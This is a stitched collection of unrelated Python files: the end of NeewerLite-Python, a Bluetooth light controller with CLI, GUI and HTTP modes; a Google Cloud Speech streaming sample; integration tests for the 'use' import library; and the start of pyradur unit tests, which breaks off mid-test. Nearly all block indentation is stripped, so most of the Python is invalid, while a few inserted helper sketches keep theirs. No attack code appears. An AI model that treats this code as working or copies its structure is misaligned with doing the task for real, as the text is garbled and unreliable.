prefsParser.add_argument("--SC_tryConnectButton", default="Ctrl+Shift+C") # 3
prefsParser.add_argument("--SC_Tab_CCT", default="Alt+1") # 4
prefsParser.add_argument("--SC_Tab_HSI", default="Alt+2") # 5
prefsParser.add_argument("--SC_Tab_SCENE", default="Alt+3") # 6
prefsParser.add_argument("--SC_Tab_PREFS", default="Alt+4") # 7
prefsParser.add_argument("--SC_Dec_Bri_Small", default="/") # 8
prefsParser.add_argument("--SC_Inc_Bri_Small", default="*") # 9
prefsParser.add_argument("--SC_Dec_Bri_Large", default="Ctrl+/") # 10
prefsParser.add_argument("--SC_Inc_Bri_Large", default="Ctrl+*") # 11
prefsParser.add_argument("--SC_Dec_1_Small", default="7") # 12
prefsParser.add_argument("--SC_Inc_1_Small", default="9") # 13
prefsParser.add_argument("--SC_Dec_2_Small", default="4") # 14
prefsParser.add_argument("--SC_Inc_2_Small", default="6") # 15
prefsParser.add_argument("--SC_Dec_3_Small", default="1") # 16
prefsParser.add_argument("--SC_Inc_3_Small", default="3") # 17
prefsParser.add_argument("--SC_Dec_1_Large", default="Ctrl+7") # 18
prefsParser.add_argument("--SC_Inc_1_Large", default="Ctrl+9") # 19
prefsParser.add_argument("--SC_Dec_2_Large", default="Ctrl+4") # 20
prefsParser.add_argument("--SC_Inc_2_Large", default="Ctrl+6") # 21
prefsParser.add_argument("--SC_Dec_3_Large", default="Ctrl+1") # 22
prefsParser.add_argument("--SC_Inc_3_Large", default="Ctrl+3") # 23
# "HIDDEN" DEBUG OPTIONS - oooooh!
# THESE ARE OPTIONS THAT HELP DEBUG THINGS, BUT AREN'T REALLY USEFUL FOR NORMAL OPERATION
# enableTabsOnLaunch SHOWS ALL TABS ACTIVE (INSTEAD OF DISABLING THEM) ON LAUNCH SO EVEN WITHOUT A LIGHT, A BYTESTRING CAN BE CALCULATED
prefsParser.add_argument("--enableTabsOnLaunch", default=0)
mainPrefs = prefsParser.parse_args(mainPrefs)
# SET GLOBAL VALUES BASED ON PREFERENCES
findLightsOnStartup = bool(int(mainPrefs.findLightsOnStartup)) # whether or not to scan for lights on launch
autoConnectToLights = bool(int(mainPrefs.autoConnectToLights)) # whether or not to connect to lights when found
printDebug = bool(int(mainPrefs.printDebug)) # whether or not to display debug messages in the console
maxNumOfAttempts = int(mainPrefs.maxNumOfAttempts) # maximum number of attempts before failing out
rememberLightsOnExit = bool(int(mainPrefs.rememberLightsOnExit)) # whether or not to remember light mode/settings when quitting out
rememberPresetsOnExit = bool(int(mainPrefs.rememberPresetsOnExit)) # whether or not to remember the custom presets when quitting out
if type(mainPrefs.acceptableIPs) is not list: # we have a string in the return, so we need to post-process it
acceptable_HTTP_IPs = mainPrefs.acceptableIPs.replace(" ", "").split(";") # split the IP addresses into a list for acceptable IPs
else: # the return is already a list (the default list), so return it
acceptable_HTTP_IPs = mainPrefs.acceptableIPs
if type(mainPrefs.whiteListedMACs) is not list: # if we've specified MAC addresses to whitelist, add them to the global list
whiteListedMACs = mainPrefs.whiteListedMACs.replace(" ", "").split(";")
# RETURN THE CUSTOM KEYBOARD MAPPINGS
customKeys = [mainPrefs.SC_turnOffButton, mainPrefs.SC_turnOnButton, mainPrefs.SC_scanCommandButton, mainPrefs.SC_tryConnectButton, \
mainPrefs.SC_Tab_CCT, mainPrefs.SC_Tab_HSI, mainPrefs.SC_Tab_SCENE, mainPrefs.SC_Tab_PREFS, \
mainPrefs.SC_Dec_Bri_Small, mainPrefs.SC_Inc_Bri_Small, mainPrefs.SC_Dec_Bri_Large, mainPrefs.SC_Inc_Bri_Large, \
mainPrefs.SC_Dec_1_Small, \
mainPrefs.SC_Inc_1_Small, \
mainPrefs.SC_Dec_2_Small, \
mainPrefs.SC_Inc_2_Small, \
mainPrefs.SC_Dec_3_Small, \
mainPrefs.SC_Inc_3_Small, \
mainPrefs.SC_Dec_1_Large, \
mainPrefs.SC_Inc_1_Large, \
mainPrefs.SC_Dec_2_Large, \
mainPrefs.SC_Inc_2_Large, \
mainPrefs.SC_Dec_3_Large, \
mainPrefs.SC_Inc_3_Large]
enableTabsOnLaunch = bool(int(mainPrefs.enableTabsOnLaunch))
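# A sketch of the global preferences file format implied by the parser above (the keys exist in
# acceptable_arguments; the example values are illustrative): one setting per line, written as
# key=value - lines that don't contain a recognized key are dropped, so they can act as comments.
# For example:
#   printDebug=0
#   maxNumOfAttempts=10
#   acceptableIPs=127.0.0.1;192.168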
if __name__ == '__main__':
singleInstanceLock() # make a lockfile if one doesn't exist yet, and quit out if one does
if os.path.exists(globalPrefsFile):
loadPrefsFile(globalPrefsFile) # if a preferences file exists, process it and load the preferences
else:
loadPrefsFile() # if it doesn't, then just load the defaults
if os.path.exists(customLightPresetsFile):
loadCustomPresets() # if there's a custom mapping for presets, then load that into memory
loop = asyncio.get_event_loop() # get the current asyncio loop
cmdReturn = [True] # initially set to show the GUI interface over the CLI interface
if len(sys.argv) > 1: # if we have more than 1 argument on the command line (the script itself is argument 1), then process switches
cmdReturn = processCommands()
printDebug = cmdReturn[1] # if we use the --quiet option, then don't show debug strings in the console
if cmdReturn[0] == False: # if we're trying to load the CLI, make sure we aren't already running another version of it
doAnotherInstanceCheck() # check to see if another instance is running, and if it is, then error out and quit
# START HTTP SERVER HERE AND SIT IN THIS LOOP UNTIL THE END
if cmdReturn[0] == "HTTP":
doAnotherInstanceCheck() # check to see if another instance is running, and if it is, then error out and quit
webServer = ThreadingHTTPServer(("", 8080), NLPythonServer)
try:
printDebugString("Starting the HTTP Server on Port 8080...")
printDebugString("-------------------------------------------------------------------------------------")
# start the HTTP server and wait for requests
webServer.serve_forever()
except KeyboardInterrupt:
pass
finally:
printDebugString("Stopping the HTTP Server...")
webServer.server_close()
# DISCONNECT FROM EACH LIGHT BEFORE FINISHING THE PROGRAM
printDebugString("Attempting to unlink from lights...")
loop.run_until_complete(parallelAction("disconnect", [-1], False)) # disconnect from all lights in parallel
printDebugString("Closing the program NOW")
singleInstanceUnlockandQuit(0) # delete the lock file and quit out
if cmdReturn[0] == "LIST":
doAnotherInstanceCheck() # check to see if another instance is running, and if it is, then error out and quit
print("NeewerLite-Python 0.11 by Zach Glenwright")
print("Searching for nearby Neewer lights...")
loop.run_until_complete(findDevices())
if len(availableLights) > 0:
print()
if len(availableLights) == 1: # we only found one
print("We found 1 Neewer light on the last search.")
else: # we found more than one
print("We found " + str(len(availableLights)) + " Neewer lights on the last search.")
print()
if platform.system() == "Darwin": # if we're on MacOS, then we display the GUID instead of the MAC address
addressCharsAllowed = 36 # GUID addresses are 36 characters long
addressString = "GUID (MacOS)"
else:
addressCharsAllowed = 17 # MAC addresses are 17 characters long
addressString = "MAC Address"
nameCharsAllowed = 79 - addressCharsAllowed # the remaining space is to display the light name
# PRINT THE HEADERS
print(formatStringForConsole("Custom Name (Light Type)", nameCharsAllowed) + \
" " + \
formatStringForConsole(addressString, addressCharsAllowed))
# PRINT THE SEPARATORS
print(formatStringForConsole("-", nameCharsAllowed) + " " + formatStringForConsole("-", addressCharsAllowed))
# PRINT THE LIGHTS
for a in range(len(availableLights)):
lightName = availableLights[a][2] + " (" + availableLights[a][0].name + ")"
print(formatStringForConsole(lightName, nameCharsAllowed) + " " + \
formatStringForConsole(availableLights[a][0].address, addressCharsAllowed))
print(formatStringForConsole(" > RSSI: " + str(availableLights[a][0].rssi) + "dBm", nameCharsAllowed))
else:
print("We did not find any Neewer lights on the last search.")
singleInstanceUnlockandQuit(0) # delete the lock file and quit out
printDebugString(" > Launch GUI: " + str(cmdReturn[0]))
printDebugString(" > Show Debug Strings on Console: " + str(cmdReturn[1]))
printDebugString(" > Mode: " + cmdReturn[3])
if cmdReturn[3] == "CCT":
printDebugString(" > Color Temperature: " + str(cmdReturn[4]) + "00K")
printDebugString(" > Brightness: " + str(cmdReturn[5]))
elif cmdReturn[3] == "HSI":
printDebugString(" > Hue: " + str(cmdReturn[4]))
printDebugString(" > Saturation: " + str(cmdReturn[5]))
printDebugString(" > Brightness: " + str(cmdReturn[6]))
elif cmdReturn[3] == "ANM":
printDebugString(" > Scene: " + str(cmdReturn[4]))
printDebugString(" > Brightness: " + str(cmdReturn[5]))
if cmdReturn[0] == False: # if we're not showing the GUI, we need to specify a MAC address
if cmdReturn[2] != "":
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> MAC Address of light to send command to: " + cmdReturn[2].upper())
loop.run_until_complete(connectToOneLight(cmdReturn[2])) # get Bleak object linking to this specific light and getting custom prefs
else:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> You did not specify a light to send the command to - use the --light switch")
printDebugString(" > CLI >> and write either a MAC Address (XX:XX:XX:XX:XX:XX) to a Neewer light or")
printDebugString(" > CLI >> ALL to send to all available Neewer lights found by Bluetooth")
printDebugString("-------------------------------------------------------------------------------------")
if cmdReturn[0] == True: # launch the GUI with the command-line arguments
if importError == 0:
try: # try to load the GUI
app = QApplication(sys.argv)
if anotherInstance == True: # unlike the CLI handling, the GUI shows a dialog box asking whether to quit or launch a new instance
errDlg = QMessageBox()
errDlg.setWindowTitle("Another Instance Running!")
errDlg.setTextFormat(Qt.TextFormat.RichText)
errDlg.setText("There is another instance of NeewerLite-Python already running. Please close out of that instance first before trying to launch a new instance of the program.<br><br>If you are positive that you don't have any other instances running and you want to launch a new one anyway, click <em>Launch New Instance</em> below. Otherwise click <em>Quit</em> to quit out.")
errDlg.addButton("Launch New Instance", QMessageBox.ButtonRole.YesRole)
errDlg.addButton("Quit", QMessageBox.ButtonRole.NoRole)
errDlg.setDefaultButton(QMessageBox.No)
errDlg.setIcon(QMessageBox.Warning)
button = errDlg.exec_()
if button == 1: # if we clicked the Quit button, then quit out
sys.exit(1)
mainWindow = MainWindow()
# SET UP GUI BASED ON COMMAND LINE ARGUMENTS
if len(cmdReturn) > 1:
if cmdReturn[3] == "CCT": # set up the GUI in CCT mode with specified parameters (or default, if none)
mainWindow.setUpGUI(colorMode=cmdReturn[3], temp=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "HSI": # set up the GUI in HSI mode with specified parameters (or default, if none)
mainWindow.setUpGUI(colorMode=cmdReturn[3], hue=cmdReturn[4], sat=cmdReturn[5], brightness=cmdReturn[6])
elif cmdReturn[3] == "ANM": # set up the GUI in ANM mode with specified parameters (or default, if none)
mainWindow.setUpGUI(colorMode=cmdReturn[3], scene=cmdReturn[4], brightness=cmdReturn[5])
mainWindow.show()
# START THE BACKGROUND THREAD
workerThread = threading.Thread(target=workerThread, args=(loop,), name="workerThread")
workerThread.start()
ret = app.exec_()
singleInstanceUnlockandQuit(ret) # delete the lock file and quit out
except NameError:
pass # same as above - we could not load the GUI, but we have already sorted error messages
else:
if importError == 1: # we can't load PySide2
print(" ===== CAN NOT FIND PYSIDE2 LIBRARY =====")
print(" You don't have the PySide2 Python library installed. If you're only running NeewerLite-Python from")
print(" a command-line (from a Raspberry Pi CLI for instance), or using the HTTP server, you don't need this package.")
print(" If you want to launch NeewerLite-Python with the GUI, you need to install the PySide2 package.")
print()
print(" To install PySide2, run either pip or pip3 from the command line:")
print(" pip install PySide2")
print(" pip3 install PySide2")
print()
print(" Or visit this website for more information:")
print(" https://pypi.org/project/PySide2/")
elif importError == 2: # we have PySide2, but can't load the GUI file itself for some reason
print(" ===== COULD NOT LOAD/FIND GUI FILE =====")
print(" If you don't need to use the GUI, you are fine going without the PySide2 pacakge.")
print(" but using NeewerLite-Python with the GUI requires the PySide2 library.")
print()
print(" If you have already installed the PySide2 library but are still getting this error message,")
print(" Make sure you have the ui_NeewerLightUI.py script in the same directory as NeewerLite-Python.py")
print(" If you don't know where that file is, redownload the NeewerLite-Python package from Github here:")
print(" https://github.com/taburineagle/NeewerLite-Python/")
sys.exit(1) # quit out, we can't run the program without PySide2 or the GUI (for the GUI version, at least)
else: # don't launch the GUI, send command to a light/lights and quit out
if len(cmdReturn) > 1:
if cmdReturn[3] == "CCT": # calculate CCT bytestring
calculateByteString(colorMode=cmdReturn[3], temp=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "HSI": # calculate HSI bytestring
calculateByteString(colorMode=cmdReturn[3], HSI_H=cmdReturn[4], HSI_S=cmdReturn[5], HSI_I=cmdReturn[6])
elif cmdReturn[3] == "ANM": # calculate ANM/SCENE bytestring
calculateByteString(colorMode=cmdReturn[3], animation=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "ON": # turn the light on
setPowerBytestring("ON")
elif cmdReturn[3] == "OFF": # turn the light off
setPowerBytestring("OFF")
if availableLights != []:
printDebugString(" > CLI >> Bytestring to send to light:" + updateStatus())
# CONNECT TO THE LIGHT AND SEND INFORMATION TO IT
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to connect to light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(connectToLight(0, False))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error connecting to light " + str(maxNumOfAttempts) + " times - quitting out")
singleInstanceUnlockandQuit(1) # delete the lock file and quit out
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to write to light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(writeToLight(0, False))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error writing to light " + str(maxNumOfAttempts) + " times - quitting out")
singleInstanceUnlockandQuit(1) # delete the lock file and quit out
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to disconnect from light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(disconnectFromLight(0))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error disconnecting from light " + str(maxNumOfAttempts) + " times - quitting out")
singleInstanceUnlockandQuit(1) # delete the lock file and quit out
else:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Calculated bytestring:" + updateStatus())
singleInstanceUnlockandQuit(0) # delete the lock file and quit out
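# Illustrative sketch (not used by the script itself): the three connect/write/disconnect
# retry loops above all follow the same pattern, which could be factored into a helper
# like the one below. The helper name and signature are assumptions, not part of the
# original program.
def retryLightAction(loop, actionName, coroutineFactory, maxNumOfAttempts):
    for attempt in range(1, maxNumOfAttempts + 1):
        printDebugString("-------------------------------------------------------------------------------------")
        printDebugString(" > CLI >> Attempting to " + actionName + " (attempt " + str(attempt) + " of " + str(maxNumOfAttempts) + ")")
        printDebugString("-------------------------------------------------------------------------------------")
        if loop.run_until_complete(coroutineFactory()):  # each factory call returns a fresh coroutine
            return True
    printDebugString("Error trying to " + actionName + " " + str(maxNumOfAttempts) + " times - quitting out")
    return False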
|
transcribe_streaming.py
|
#!/usr/bin/python
# Copyright (C) 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Sample that streams audio to the Google Cloud Speech API via GRPC."""
from __future__ import division
import contextlib
import re
import signal
import threading
from google.cloud import credentials
from google.cloud.speech.v1beta1 import cloud_speech_pb2 as cloud_speech
from google.rpc import code_pb2
from grpc.beta import implementations
from grpc.framework.interfaces.face import face
import pyaudio
from six.moves import queue
# Audio recording parameters
RATE = 16000
CHUNK = int(RATE / 10) # 100ms
# The Speech API has a streaming limit of 60 seconds of audio*, so keep the
# connection alive for that long, plus some more to give the API time to figure
# out the transcription.
# * https://g.co/cloud/speech/limits#content
DEADLINE_SECS = 60 * 3 + 5
SPEECH_SCOPE = 'https://www.googleapis.com/auth/cloud-platform'
def make_channel(host, port):
"""Creates an SSL channel with auth credentials from the environment."""
# In order to make an https call, use an ssl channel with defaults
ssl_channel = implementations.ssl_channel_credentials(None, None, None)
# Grab application default credentials from the environment
creds = credentials.get_credentials().create_scoped([SPEECH_SCOPE])
# Add a plugin to inject the creds into the header
auth_header = (
'Authorization',
'Bearer ' + creds.get_access_token().access_token)
auth_plugin = implementations.metadata_call_credentials(
lambda _, cb: cb([auth_header], None),
name='google_creds')
# compose the two together for both ssl and google auth
composite_channel = implementations.composite_channel_credentials(
ssl_channel, auth_plugin)
return implementations.secure_channel(host, port, composite_channel)
def _audio_data_generator(buff):
"""A generator that yields all available data in the given buffer.
Args:
buff - a Queue object, where each element is a chunk of data.
Yields:
A chunk of data that is the aggregate of all chunks of data in `buff`.
The function will block until at least one data chunk is available.
"""
while True:
# Use a blocking get() to ensure there's at least one chunk of data
chunk = buff.get()
if not chunk:
# A falsey value indicates the stream is closed.
break
data = [chunk]
# Now consume whatever other data's still buffered.
while True:
try:
data.append(buff.get(block=False))
except queue.Empty:
break
yield b''.join(data)
def _fill_buffer(audio_stream, buff, chunk):
"""Continuously collect data from the audio stream, into the buffer."""
try:
while True:
buff.put(audio_stream.read(chunk))
except IOError:
# This happens when the stream is closed. Signal that we're done.
buff.put(None)
# [START audio_stream]
@contextlib.contextmanager
def record_audio(rate, chunk):
"""Opens a recording stream in a context manager."""
audio_interface = pyaudio.PyAudio()
audio_stream = audio_interface.open(
format=pyaudio.paInt16,
# The API currently only supports 1-channel (mono) audio
# https://goo.gl/z757pE
channels=1, rate=rate,
input=True, frames_per_buffer=chunk,
)
# Create a thread-safe buffer of audio data
buff = queue.Queue()
# Spin up a separate thread to buffer audio data from the microphone
# This is necessary so that the input device's buffer doesn't overflow
# while the calling thread makes network requests, etc.
fill_buffer_thread = threading.Thread(
target=_fill_buffer, args=(audio_stream, buff, chunk))
fill_buffer_thread.start()
yield _audio_data_generator(buff)
audio_stream.stop_stream()
audio_stream.close()
fill_buffer_thread.join()
audio_interface.terminate()
# [END audio_stream]
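# Minimal usage sketch (illustrative only, not part of the original sample): grab a single
# ~100ms chunk of microphone audio through the context manager above. The helper name is
# an assumption and nothing in this file calls it.
def _record_one_chunk():
    with record_audio(RATE, CHUNK) as audio_generator:
        # next() blocks until the fill-buffer thread has queued the first chunk
        return next(audio_generator)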
def request_stream(data_stream, rate):
"""Yields `StreamingRecognizeRequest`s constructed from a recording audio
stream.
Args:
data_stream: A generator that yields raw audio data to send.
rate: The sampling rate in hertz.
"""
# The initial request must contain metadata about the stream, so the
# server knows how to interpret it.
recognition_config = cloud_speech.RecognitionConfig(
# There are a bunch of config options you can specify. See
# https://goo.gl/KPZn97 for the full list.
encoding='LINEAR16', # raw 16-bit signed LE samples
sample_rate=rate, # the rate in hertz
# See
# https://g.co/cloud/speech/docs/best-practices#language_support
# for a list of supported languages.
language_code='en-US', # a BCP-47 language tag
)
streaming_config = cloud_speech.StreamingRecognitionConfig(
config=recognition_config,
)
yield cloud_speech.StreamingRecognizeRequest(
streaming_config=streaming_config)
for data in data_stream:
# Subsequent requests can all just have the content
yield cloud_speech.StreamingRecognizeRequest(audio_content=data)
def listen_print_loop(recognize_stream):
for resp in recognize_stream:
if resp.error.code != code_pb2.OK:
raise RuntimeError('Server error: ' + resp.error.message)
# Display the transcriptions & their alternatives
for result in resp.results:
print(result.alternatives)
# Exit recognition if any of the transcribed phrases could be
# one of our keywords.
if any(re.search(r'\b(exit|quit)\b', alt.transcript, re.I)
for result in resp.results
for alt in result.alternatives):
print('Exiting..')
break
def main():
with cloud_speech.beta_create_Speech_stub(
make_channel('speech.googleapis.com', 443)) as service:
# For streaming audio from the microphone, there are three threads.
# First, a thread that collects audio data as it comes in
with record_audio(RATE, CHUNK) as buffered_audio_data:
# Second, a thread that sends requests with that data
requests = request_stream(buffered_audio_data, RATE)
# Third, a thread that listens for transcription responses
recognize_stream = service.StreamingRecognize(
requests, DEADLINE_SECS)
# Exit things cleanly on interrupt
signal.signal(signal.SIGINT, lambda *_: recognize_stream.cancel())
# Now, put the transcription responses to use.
try:
listen_print_loop(recognize_stream)
recognize_stream.cancel()
except face.CancellationError:
# This happens because of the interrupt handler
pass
if __name__ == '__main__':
main()
|
integration_test.py
|
import functools
import os
import re
import sys
import tempfile
import warnings
from collections.abc import Callable
from contextlib import closing
from importlib.machinery import SourceFileLoader
from pathlib import Path
from threading import _shutdown_locks
import packaging.tags
import packaging.version
import pytest
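# The block below temporarily splices the local src/ directory into sys.path so that
# `use` is imported from the checked-out source tree rather than an installed copy,
# then puts the path back once the import has completed.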
if Path("src").is_dir():
sys.path.insert(0, "") if "" not in sys.path else None
lpath, rpath = (
sys.path[: sys.path.index("") + 1],
sys.path[sys.path.index("") + 2 :],
)
try:
sys.path.clear()
sys.path.__iadd__(lpath + [os.path.join(os.getcwd(), "src")] + rpath)
import use
finally:
sys.path.clear()
sys.path.__iadd__(lpath + rpath)
import_base = Path(__file__).parent.parent / "src"
is_win = sys.platform.startswith("win")
import use
__package__ = "tests"
from tests.unit_test import reuse, ScopedCwd
import logging
log = logging.getLogger(".".join((__package__, __name__)))
log.setLevel(logging.DEBUG if use.config["debugging"] else logging.NOTSET)
params = [
# ("olefile", "0.46"), # Windows-only
("workerpool", "0.9.4"),
("fastcache", "1.1.0"),
("pytest-cov", "2.12.1"),
("pytest-env", "0.6.2"),
("requests", "2.24.0"),
("furl", "2.1.2"),
("wheel", "0.36.2"),
("icontract", "2.5.4"),
("tiledb", "0.9.5"),
("wurlitzer", "3.0.2"),
# ("cctools", "7.0.17"), # too slow, takes minutes to build
("clang", "9.0"),
]
@pytest.mark.parametrize("name,version", params)
def test_sample(reuse, name, version):
try:
reuse(name, version=version, modes=reuse.auto_install)
except BaseException as ie:
suggestion = ie.args[0].strip().splitlines()[-1]
log.debug("suggestion = %s", repr(suggestion))
mod = eval(suggestion)
assert mod
return
assert False, "Should raise ImportError: missing hashes."
@pytest.mark.parametrize("name, version", (("numpy", "1.19.3"),))
def test_86_numpy(reuse, name, version):
use = reuse # for the eval() later
with pytest.raises(RuntimeWarning) as w:
reuse(name, version=version, modes=reuse.auto_install)
assert w
recommendation = str(w.value).split("\n")[-1].strip()
mod = eval(recommendation)
assert mod.__name__ == reuse._parse_name(name)[1]
return mod # for the redownload test
def test_redownload_module(reuse):
def inject_fault(*, path, **kwargs):
log.info("fault_inject: deleting %s", path)
path.delete()
assert test_86_numpy(reuse, "example-pypi-package/examplepy", "0.1.0")
try:
reuse.config["fault_inject"] = inject_fault
assert test_86_numpy(reuse, "example-pypi-package/examplepy", "0.1.0")
finally:
del reuse.config["fault_inject"]
assert test_86_numpy(reuse, "example-pypi-package/examplepy", "0.1.0")
def double_function(func):
import functools
@functools.wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs) * 2
return wrapper
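# Illustrative usage (not part of the original tests): double_function doubles a wrapped
# function's return value while functools.wraps keeps its metadata intact, e.g.
#     doubled = double_function(lambda: 3)
#     doubled() == 6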
def test_aspectize_defaults(reuse):
# baseline
srcdir = Path(__file__).parent.parent.parent
if "tests.simple_funcs" in sys.modules:
del sys.modules["tests.simple_funcs"]
with ScopedCwd(srcdir):
mod = reuse(reuse.Path("./tests/simple_funcs.py"), package_name="tests")
assert mod.two() == 2
def test_aspectize_function_by_name(reuse):
# functions with specific names only
srcdir = Path(__file__).parent.parent.parent
if "tests.simple_funcs" in sys.modules:
del sys.modules["tests.simple_funcs"]
with ScopedCwd(srcdir):
mod = (
reuse(reuse.Path("./tests/simple_funcs.py"), package_name="tests")
@ (reuse.isfunction, "two", double_function)
)
assert mod.two() == 4
assert mod.three() == 3
assert reuse.ismethod
def test_aspectize_all_functions(reuse):
# all functions, but not classes or methods
srcdir = Path(__file__).parent.parent.parent
if "tests.simple_funcs" in sys.modules:
del sys.modules["tests.simple_funcs"]
with ScopedCwd(srcdir):
mod = (
reuse(reuse.Path("./tests/simple_funcs.py"), package_name="tests")
@ (reuse.isfunction, "", double_function)
)
assert mod.two() == 4
assert mod.three() == 6
inst = mod.Two()
assert inst() == 2
inst = mod.Three()
assert inst.three() == 3
def test_simple_url(reuse):
import http.server
port = 8089
orig_cwd = Path.cwd()
try:
os.chdir(Path(__file__).parent.parent.parent)
with http.server.HTTPServer(("", port), http.server.SimpleHTTPRequestHandler) as svr:
foo_uri = f"http://localhost:{port}/tests/.tests/foo.py"
print(f"starting thread to handle HTTP request on port {port}")
import threading
thd = threading.Thread(target=svr.handle_request)
thd.start()
print(f"loading foo module via use(URL({foo_uri}))")
with pytest.warns(use.NoValidationWarning):
mod = reuse(reuse.URL(foo_uri), initial_globals={"a": 42})
assert mod.test() == 42
finally:
os.chdir(orig_cwd)
def test_autoinstall_numpy_dual_version(reuse):
ver1, ver2 = "1.19.3", "1.19.5"
for ver in (ver1, ver2):
for k,v in list(sys.modules.items()):
if k == "numpy" or k.startswith("numpy."):
loader = (
getattr(v, "__loader__", None)
or v.__spec__.loader
)
if isinstance(loader, SourceFileLoader):
del sys.modules[k]
try:
mod = suggested_artifact(reuse, "numpy", version=ver)
assert mod
assert mod.__version__ == ver
except RuntimeError:
pass
def test_autoinstall_protobuf(reuse):
ver = "3.19.1"
mod = suggested_artifact(
reuse, "protobuf/google.protobuf", version=ver
)
assert mod.__version__ == ver
assert mod.__name__ == "google.protobuf"
assert (
tuple(Path(mod.__file__).parts[-3:])
== ("google", "protobuf", "__init__.py")
)
def suggested_artifact(reuse, *args, **kwargs):
reuse.pimp._clean_sys_modules(args[0].split("/")[-1].split(".")[0])
try:
mod = reuse(
*args,
modes=reuse.auto_install | reuse.Modes.fastfail,
**kwargs
)
return mod
except RuntimeWarning as rw:
last_line = str(rw).strip().splitlines()[-1].strip()
log.info("Usimg last line as suggested artifact: %s", repr(last_line))
last_line2 = last_line.replace("protobuf", "protobuf/google.protobuf")
mod = eval(last_line2)
log.info("suggest artifact returning: %s", mod)
return mod
|
test_pyradur.py
|
# MIT License
#
# Copyright (c) 2018-2019 Garmin International or its subsidiaries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from pyradur import Dict
from pyradur.db import Sqlite3DB
from pyradur.server import SockServer
import tempfile
import threading
import unittest
import shutil
import os
import logging
import sys
class CommonTests(object):
use_cache = True
close_on_cleanup = True
def _server_thread(self, event):
try:
self.server.db.add_db('var', Sqlite3DB(':memory:'))
event.set()
self.server.serve_forever()
# Process any outstanding events until the queue is empty
while self.server.handle_request():
pass
except Exception as e:
logging.exception('Server raised %s', e, exc_info=True)
finally:
# Close down the server. This prevents the main thread from being
# stuck blocking on a response from the server in the event that it
# has an exception
self.server.close()
def setUp(self):
root = logging.getLogger()
root.setLevel(logging.DEBUG)
self.handler = logging.StreamHandler(sys.stdout)
self.handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
self.handler.setFormatter(formatter)
root.addHandler(self.handler)
self.addCleanup(root.removeHandler, self.handler)
self.tempdir = tempfile.mkdtemp(prefix='pyradur-')
self.addCleanup(shutil.rmtree, self.tempdir, ignore_errors=True)
self.sock_path = os.path.join(self.tempdir, 'sock')
self.server = SockServer(self.sock_path)
self.server_suspended = False
try:
event = threading.Event()
self.server_thread = threading.Thread(target=self._server_thread, args=[event])
self.server_thread.start()
event.wait()
self.addCleanup(self.check_server)
self.addCleanup(self.server_thread.join)
self.addCleanup(self.server.shutdown)
except Exception as e:
self.server.close()
raise e
def check_server(self):
# Check that all clients have disconnected
self.assertDictEqual(self.server.clients, {})
def get_dict(self, name, share_connection=True):
d = Dict(self.sock_path, name, use_cache=self.use_cache, share_connection=share_connection)
if self.close_on_cleanup:
self.addCleanup(lambda: d.close())
return d
def test_basic_get_set(self):
d = self.get_dict('var')
d['foo'] = 'bar'
self.assertEqual(d['foo'], 'bar')
with self.assertRaises(KeyError):
d['baz']
def test_get_set_shared(self):
a = self.get_dict('var')
b = self.get_dict('var')
a['foo'] = 'bar'
self.assertEqual(b['foo'], 'bar')
def test_get_set_nonshared(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertEqual(a.get('bat', 'baz'), 'baz')
a.sync()
self.assertFalse('baz' in b)
a.set('test', 'blah')
a.sync()
self.assertEqual(b['test'], 'blah')
def test_del_nonshared(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
